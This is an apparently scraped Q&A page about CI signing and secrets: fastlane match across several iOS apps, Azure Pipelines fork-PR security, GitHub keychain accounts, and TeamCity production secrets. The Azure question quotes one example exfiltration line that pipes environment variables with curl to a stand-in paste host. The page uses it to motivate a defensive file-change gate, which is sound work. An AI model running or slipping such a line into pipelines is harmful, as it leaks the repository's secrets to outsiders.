Fastlane match with multiple apps - xcode

I have a developer account with multiple apps. I am using fastlane match to generate certs and profiles. Using match, it creates new certs. See the code below for how I generate them.
lane :GenerateCerts do
match(app_identifier: "dev", type: "development")
match(app_identifier: "stage", type: "development")
match(app_identifier: "stage", type: "appstore")
end
I have already crossed the limit on the developer account for generating new iOS Distribution certs, so I am not able to generate a new one. But I guess the certificate already on the dev portal can be used for generating profiles.
How can I use the certificate already in the portal to generate profiles?
Also, I need to manually set the profiles in Xcode for different configurations. Which command could help configure the certificates generated by match, cert or sigh in Xcode?
What is the best practice for the following case, when I have a single developer account for multiple apps?
Creating a different git repo for each app for fastlane match
A single repo for all apps.
For now I am using the first one. If you have any better suggestions, please help.

How can I use the certificate already in the portal to generate profiles?
This use case is not supported by match. Match only supports syncing profiles it created. If you want to work around this, you can manually create an identical, encrypted git repo and it will work from there. There are instructions for modifying one on the advanced documentation page.
Instead, you could review the source code for match, which uses cert and sigh under the hood, and create a custom action for your specific use case.
But honestly it's easier to just destroy the existing certs and make new ones with match.
Also, I need to manually set the profiles in Xcode for different configurations. Which command could help configure the certificates generated by match, cert or sigh in Xcode?
To clarify:
cert will get (or create, if necessary) a code signing certificate
sigh will get (or create, if necessary) a provisioning profile signed with a code signing certificate
match calls the above commands and syncs their outputs via an encrypted git repo
So if you want to configure certificates, use cert.
What is the best practice for the following case, when I have a single developer account for multiple apps?
There's not really a best practice here that I know of. You have a few options, each with their own tradeoffs:
Use one repo per app. This benefits from complete isolation by project, which can be helpful for security purposes, but you'll need to sync the distribution profiles by hand (using the advanced technique I linked above).
Use one repo, with one branch per app. This lets you sync the same certificates around for several apps, but has a security risk because anyone with access to this repo has more privileges than they need (unless everyone works on everything).
Use one repo for distribution credentials, with an additional per-app repo for development credentials.
The second option will require the match_branch option, which can be passed in your Fastfile or (my preference) specified in your Matchfile to make your Fastfile cleaner. For the final option, you could make use of the for_lane command to override an option when called from a particular lane. For example, your Matchfile might look like:
git_url "git@github.com:my_org/my_repo_name.git"
type 'development'
readonly true
for_lane :deploy_to_app_store do
  type 'appstore'
  git_url "git@github.com:my_org/my_distribution_cert_repo.git"
end
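As an added example that is not part of the answer above, the following Fastfile sketches options 2 and 3 side by side. The bundle identifiers, branch names and repository URLs are placeholders. In fastlane's match the branch is chosen with the git_branch option, and readonly: true on CI keeps the build machine from creating or revoking certificates, which is what keeps a shared repo from drifting.

```ruby
# Added example, not from the original answer. Bundle identifiers, branch
# names and repository URLs are placeholders.
CERTS_REPO      = "git@github.com:my_org/my_repo_name.git"              # shared repo, one branch per app (option 2)
DIST_CERTS_REPO = "git@github.com:my_org/my_distribution_cert_repo.git" # distribution-only repo (option 3)

# bundle identifier => branch holding that app's development profiles
APPS = {
  "com.example.dev"   => "dev",
  "com.example.stage" => "stage",
}

platform :ios do
  # Option 2: one encrypted repo, every app keeps its profiles on its own branch.
  desc "Development profiles for every app, one branch per app"
  lane :dev_certs do
    APPS.each do |bundle_id, branch|
      match(
        type: "development",
        app_identifier: bundle_id,
        git_url: CERTS_REPO,
        git_branch: branch,
        readonly: is_ci      # CI only fetches; create or revoke from a developer machine
      )
    end
  end

  # Option 3: development credentials stay per app (above); distribution
  # credentials live in a separate repo that only the release team can read.
  desc "App Store profile from the distribution-only repo"
  lane :deploy_to_app_store do |options|
    match(
      type: "appstore",
      app_identifier: options[:bundle_id] || "com.example.stage",
      git_url: DIST_CERTS_REPO,
      readonly: true
    )
    # build_app and upload_to_app_store would follow here
  end
end
```

Only whoever runs match without readonly needs write access to either repo and an Apple Developer login; everyone else, CI included, needs just the repo read permission and the decryption passphrase for the repo they are allowed to see.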

Related

Provisioning fails due to company policy

I wanted to try provisioning my app resources in Azure using the Teams Toolkit, but it fails to create the resource group since my company requires 4 tags to be added.
Is there a way to tell the toolkit to either add those tags or create the resource group myself and make it aware of it?
I tried doing it with Teams Toolkit and didn't find any option to configure the resources (choose an existing one or set up a policy).
The doc (Deploy your app to Azure) also doesn't mention doing this, and even on the marketplace it isn't mentioned that we can configure it.

Run security checks before running Azure Pipeline CI on public PR

I have a public repo. Random GitHub users are free to create pull requests, and this is great.
My CI pipeline is described in a normal file in the repo called pipelines.yml (we use Azure pipelines).
Unfortunately this means that a random GitHub user is able to steal all my secret environment variables by creating a PR where they edit the pipelines.yml and add a bash script line with something like:
export | curl -XPOST 'http://pastebin-bla/xxxx'
Or run arbitrary code, in general. Right?
How can I verify that a malicious PR doesn't change at least some critical files?
How can I verify that a malicious PR doesn't change at least some critical files?
I am afraid we cannot prevent a PR from changing certain critical files.
As a workaround, we could turn off automatic fork builds and instead use pull request comments as a way to manually build these contributions, which gives you an opportunity to review the code before triggering a build.
You could check the document Consider manually triggering fork builds for some more details.
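As an added example that is not part of the answer above, here is a small Ruby gate a maintainer could run before triggering a fork build: it takes the output of `git diff --name-status` between the base branch and the PR head and refuses if any changed path matches a protected pattern (the pipeline definition, its templates, deployment scripts). The protected paths and the sample diff are constructed for illustration. The answer's caveat still applies: a check like this only helps if it runs from a pipeline definition the PR author cannot edit, because a PR that changes pipelines.yml would otherwise also control the gate.

```ruby
# Added example, not from the original answer: refuse to build a pull request
# that modifies files controlling the pipeline or the deployment.
# The protected patterns are assumed for illustration; adapt them to your repo.

PROTECTED_PATTERNS = [
  "pipelines.yml",          # the pipeline definition itself
  ".azure-pipelines/**/*",  # any templates it includes
  "scripts/deploy/**/*",    # deployment scripts that run with secrets
].freeze

# Constructed sample of `git diff --name-status` output for a hostile PR,
# used below to show the gate in action.
SAMPLE_DIFF = "M\tREADME.md\n" \
              "A\tsrc/feature.rb\n" \
              "M\tpipelines.yml\n" \
              "R100\tscripts/deploy/release.sh\tscripts/release.sh\n" \
              "M\t.azure-pipelines/templates/build.yml\n"

# Parse `git diff --name-status <base>...<head>` output into the list of paths
# the pull request adds, modifies, deletes or renames. For renames and copies
# both the old and the new name are returned, so moving a protected file
# somewhere else (or moving something onto it) is still caught.
def changed_paths(name_status_output)
  name_status_output.each_line.flat_map do |line|
    fields = line.chomp.split("\t")
    next [] if fields.size < 2          # blank line or malformed entry
    fields.drop(1)                      # everything after the status code is a path
  end
end

# Return the subset of changed paths that match a protected pattern.
# FNM_PATHNAME makes "*" stop at "/", so "pipelines.yml" does not match
# "docs/pipelines.yml"; "**/" then matches any depth under a protected directory.
def protected_paths_changed(paths, patterns = PROTECTED_PATTERNS)
  flags = File::FNM_PATHNAME | File::FNM_DOTMATCH
  paths.select { |path| patterns.any? { |pat| File.fnmatch?(pat, path, flags) } }
end

# Exit status for a CI step: 0 when the PR is safe to build, 1 otherwise.
def gate(name_status_output, patterns = PROTECTED_PATTERNS)
  hits = protected_paths_changed(changed_paths(name_status_output), patterns)
  return 0 if hits.empty?
  warn "refusing to build: pull request modifies protected files:"
  hits.each { |path| warn "  #{path}" }
  1
end

if ARGV.empty?
  # No refs given: demonstrate on the constructed sample (it is refused).
  gate(SAMPLE_DIFF)
else
  # Usage as a pipeline step: ruby check_protected_paths.rb origin/main HEAD
  # The array form of IO.popen keeps the refs from passing through a shell.
  base = ARGV[0]
  head = ARGV.fetch(1, "HEAD")
  diff = IO.popen(["git", "diff", "--name-status", "#{base}...#{head}"], &:read)
  exit gate(diff)
end
```

Run it against the merge base of the PR (`origin/main...HEAD`, the three-dot form) rather than the PR head alone, otherwise files the fork never touched but that differ from the base branch would also be flagged.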

How can I store keychain credentials for multiple Github accounts?

I am running Git on OSX Mavericks and have not had issues until now. What has changed is that I'm trying to use two Github accounts on different repos on the same computer.
The problem is that the osx-keychain is storing the login information from my first account. That was terrific before, but whenever I try to commit or push from my new Github account, it is defaulting to use the keychain's username and password values, and ignoring the locally-defined git config (or even global git config!) files.
I can delete my osx-keychain, and then push to the new account, but in doing so it will create a new keychain for that account, which puts me back at square one: able to push to my secondary account with the new keychain values but locked out of my primary account.
So I'm stuck in an "either-or" situation, and I'm really hoping there's a "both" solution. Any help?
P.S. I have tried this solution, and it did not work, as the osx-keychain appeared to override the SSH Identity functionality.
If you are using an https URL, then the solution you mention wouldn't have any effect: it is for multiple ssh keys.
Regarding https, this question mentions a few solutions, including:
By default gitcredentials only considers the domain name.
If you want git to consider the full path (e.g. if you have multiple GitHub accounts), set the useHttpPath variable to true, as described at gitcredentials.
Note that changing this setting will ask your credentials again for each URL.
By default, Git does not consider the "path" component of an http URL to be worth matching via external helpers.
This means that a credential stored for https://example.com/foo.git will also be used for https://example.com/bar.git.
If you do want to distinguish these cases, set this option to true.
Also, make sure your https URL includes your account name:
git clone https://user1@github.com/auser/aprojectX
git clone https://user2@github.com/auser/aprojectY
That will help a credential helper know which account/password it should be looking for.
Finally, the authentication you are using for accessing a git repo hosting service has nothing to do with:
git config (--global) user.name
That last config is only for setting the author associated with your local commits.
It is not for selecting the account used to access a remote hosting website.

How can I use TeamCity to do Production releases safely?

We currently use TeamCity to build a deployment artifact, then a further TeamCity task takes that artifact and deploys it to our development and testing servers on demand.
We can store the passwords and other secret data in properties files that we can check into source control, as these are all internal servers and the developers have full access to them.
However for release to Production (and our final test layer) there are secret passwords and configuration that we don't want checked into the normal source control, or to have development be able to discover the passwords. So to do 'real' deployments we have to hand the artifact over to another team and they maintain a properties file with the production values.
What methods exist to store these secrets and allow TeamCity to run a deploy without ever leaking the secrets out?
(note I am one of the devs and it is not a trust issue... I don't want to have the ability to find out prod passwords so I can never accidentally know them and do some horrific damage!)
Probably what you need here is to create a separate project with a narrower scope of permissions (for example, allow only certain people to edit build configurations). In this project create a build configuration responsible for deployment. In this configuration, you can define a Typed Parameter of type 'password' to store the password to the production environment.
Another option is to use the Deployer Plugin, especially its ability to deploy over ssh with private key authentication.
If you are OK to use a third party solution, consider using a solution like CloudMunch which can help you to perform release management functions with these secure parameters collected at deploy time and encrypted post deployment.
Disclaimer: I work with CloudMunch
You can do 2 things.
Use a TeamCity project to deploy artefacts for production only. This will only be accessible to ops members.
TeamCity also supports running agents with different user ids. You can create a new user id which has access to the production "secrets" (passwords and configuration). Use this id to run the targets in the first step.

Starting processes with different unlocked keychains on MacOS

As described in the question CLI: Switch keychains in order to sign an xcodebuild, I have the problem of having to use two keychains for running xcodebuild. I need this because our enterprise and App Store identities have the same name.
When I try the proposed solution it works fine if I'm running only one xcodebuild at a time. But I'm using a build server (Hudson or Jenkins) running multiple builds in parallel. Each build job should build the enterprise and the App Store version of an app, therefore it has to use different keychains. When changing the keychain list as proposed, this always affects all running processes of the current user. Therefore parallel builds of different projects would be affected and basically fail or use the wrong keychain.
I've tried several workarounds to open a new security context, which seems to host the keychain information:
I used login -f ... to start a new login session, hoping it will use an independent security context. But when I change the keychain settings in the session it also affects the other login session.
I used ssh localhost ... to start a new login session, but unfortunately with the same result.
It seems that the security context is bound to the user and not to a dedicated session. Unfortunately I cannot find any information about those security contexts using Google.
Is there any way to run several processes for a dedicated user having different keychains active and unlocked?